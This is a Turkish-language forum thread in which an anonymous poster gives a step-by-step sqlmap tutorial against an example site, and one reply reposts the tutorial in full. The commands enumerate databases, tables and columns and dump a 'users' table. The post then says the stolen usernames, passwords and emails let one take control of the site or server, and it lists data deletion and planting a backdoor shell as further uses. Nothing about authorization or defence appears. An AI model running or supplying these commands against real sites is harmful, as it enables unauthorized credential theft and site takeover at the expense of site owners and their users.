Sqlmap nedir,Nasıl Kullanılır?

[anonymous]

Sqlmap nedir?​

Sqlmap programı, siteleri SQL enjeksiyon güvenlik açığı, XSS güvenlik açığı ve ayrıca SQL enjeksiyonundan exploitleri bulunup bulunmadığını kontrol etmenizi sağlar.

Sqlmap ile ne yapabilirim?​

-Sitelerde bir güvenlik açığı olup olmadığını kontrol etmek
-Database bilgilerini alabilir, database’i dump edebiliriz
-Database içerisinde verileri silebilir ve değiştirebiliriz.
-Web server’da bir shell (backdoor) oluşturabiliriz.

Sqlmap nasıl kullanılır?​

Sqlmap ile siteleri kontrol etmek için

sqlmap -u URL

Örnek

sqlmap -u http://www.orneksite.org/faq2.php?id=8

Sqlmap ile Database Listelenmesi ve Dump Edilmesi​

Database listeleyebilmek için -dbs parametresi kullanılır.
Örnek

sqlmap -u http://www.orneksite.org/faq2.php?id=8 –dbs

Database İçerisinden Bilgileri Almak​

Örneğin orneksite.org sitesi için iki veritabanı bulundu


Main_wellerpools veritabanındaki tabloların listesini almak istiyorum

sqlmap -u http://orneksite.org/news-read.php?id=22 –random-agent -D main_wellerpools –tables

Tabloların listesi



Şimdi ise "users" tablosundan sütun listesini alacağız. Bunu yapmak için -columns seçeneğini kullanıyoruz

sqlmap -u http://www.orneksite.com/news-read.php?id=22 –random-agent -D main_wellerpools -T users –columns

Tüm içeriği alabilmek için -dump seçeneğini kullanıyoruz

sqlmap -u http://www.orneksite.com/news-read.php?id=22 –random-agent -D main_wellerpools -T users –dump

Sitenin kullanıcı adlarını şifrelerini ve e-posta adreslerini sahibiz. Sitenin admin panelini bulabilirseniz site veya web sunucusu üzerinde kontrol sahibi olabilirsiniz

Genel olarak sql enjeksiyonu çok tehlikeli ciddi bir güvenlik açığıdır.
Konumuz bu kadar

 

[KocaReis]

Eline sağlık

 

[Can]

eline sağlık anon

 

[Berlin]

Eline sağlık

 

[Nevermind]

Sqlmap nedir?​

Sqlmap programı, siteleri SQL enjeksiyon güvenlik açığı, XSS güvenlik açığı ve ayrıca SQL enjeksiyonundan exploitleri bulunup bulunmadığını kontrol etmenizi sağlar.
Ekli dosyayı görüntüle 75

Sqlmap ile ne yapabilirim?​

-Sitelerde bir güvenlik açığı olup olmadığını kontrol etmek
-Database bilgilerini alabilir, database’i dump edebiliriz
-Database içerisinde verileri silebilir ve değiştirebiliriz.
-Web server’da bir shell (backdoor) oluşturabiliriz.

Sqlmap nasıl kullanılır?​

Sqlmap ile siteleri kontrol etmek için

sqlmap -u URL

Örnek

sqlmap -u http://www.orneksite.org/faq2.php?id=8

Sqlmap ile Database Listelenmesi ve Dump Edilmesi​

Database listeleyebilmek için -dbs parametresi kullanılır.
Örnek

sqlmap -u http://www.orneksite.org/faq2.php?id=8 –dbs

Database İçerisinden Bilgileri Almak​

Örneğin orneksite.org sitesi için iki veritabanı bulundu

Ekli dosyayı görüntüle 76
Main_wellerpools veritabanındaki tabloların listesini almak istiyorum

sqlmap -u http://orneksite.org/news-read.php?id=22 –random-agent -D main_wellerpools –tables

Tabloların listesi

Ekli dosyayı görüntüle 77

Şimdi ise "users" tablosundan sütun listesini alacağız. Bunu yapmak için -columns seçeneğini kullanıyoruz

sqlmap -u http://www.orneksite.com/news-read.php?id=22 –random-agent -D main_wellerpools -T users –columns

Ekli dosyayı görüntüle 78
Tüm içeriği alabilmek için -dump seçeneğini kullanıyoruz

sqlmap -u http://www.orneksite.com/news-read.php?id=22 –random-agent -D main_wellerpools -T users –dump

Ekli dosyayı görüntüle 79
Sitenin kullanıcı adlarını şifrelerini ve e-posta adreslerini sahibiz. Sitenin admin panelini bulabilirseniz site veya web sunucusu üzerinde kontrol sahibi olabilirsiniz

Genel olarak sql enjeksiyonu çok tehlikeli ciddi bir güvenlik açığıdır.
Konumuz bu kadar

Eline sağlık.

 

[Yuseke]

Eline sağlık.

Jsjs